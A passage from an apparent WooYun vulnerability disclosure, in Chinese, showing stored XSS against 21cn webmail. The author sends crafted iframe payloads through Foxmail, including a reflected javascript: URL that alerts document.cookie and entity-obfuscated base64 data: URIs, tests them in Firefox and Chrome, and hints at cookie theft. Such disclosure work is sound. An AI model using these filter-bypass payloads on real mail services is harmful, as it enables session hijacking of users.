WooYun.org

我们还是通过foxmail 做代理发送邮件 发送邮件内容如下：
<iframe src="http://mail.21cn.com/help/freemail/main3.html?url=javascript:alert%28document.cookie%29">
<iframe src="dat&NewLine;a&colon;text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
这里我们测试三种情况，刚好我也附带了一个反射型xss，谁承想这个需要登录http://mail.21cn.com/help/freemail/main3.html?url=javascript:alert%28document.cookie%29
原理都是想通的 我们发送邮件如图所示，选择foxmail的源代码编辑（html）：

发送之后 我们查看邮箱：

我们可以看到 第一个给显示出来了，而且这里可以填写一个完整的http请求，那么我们就可以任意找一个21站的反射型xss在这里窃取cookie:
接下来 只发送一个<iframe src="dat&NewLine;a&colon;text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
然后看看效果：

登陆邮箱查看：
先登录 火狐查看：

看到这里想必明白了吧，这个东西可以再chrom下面执行：
我们看看chrom

后续怎么做就不用多说了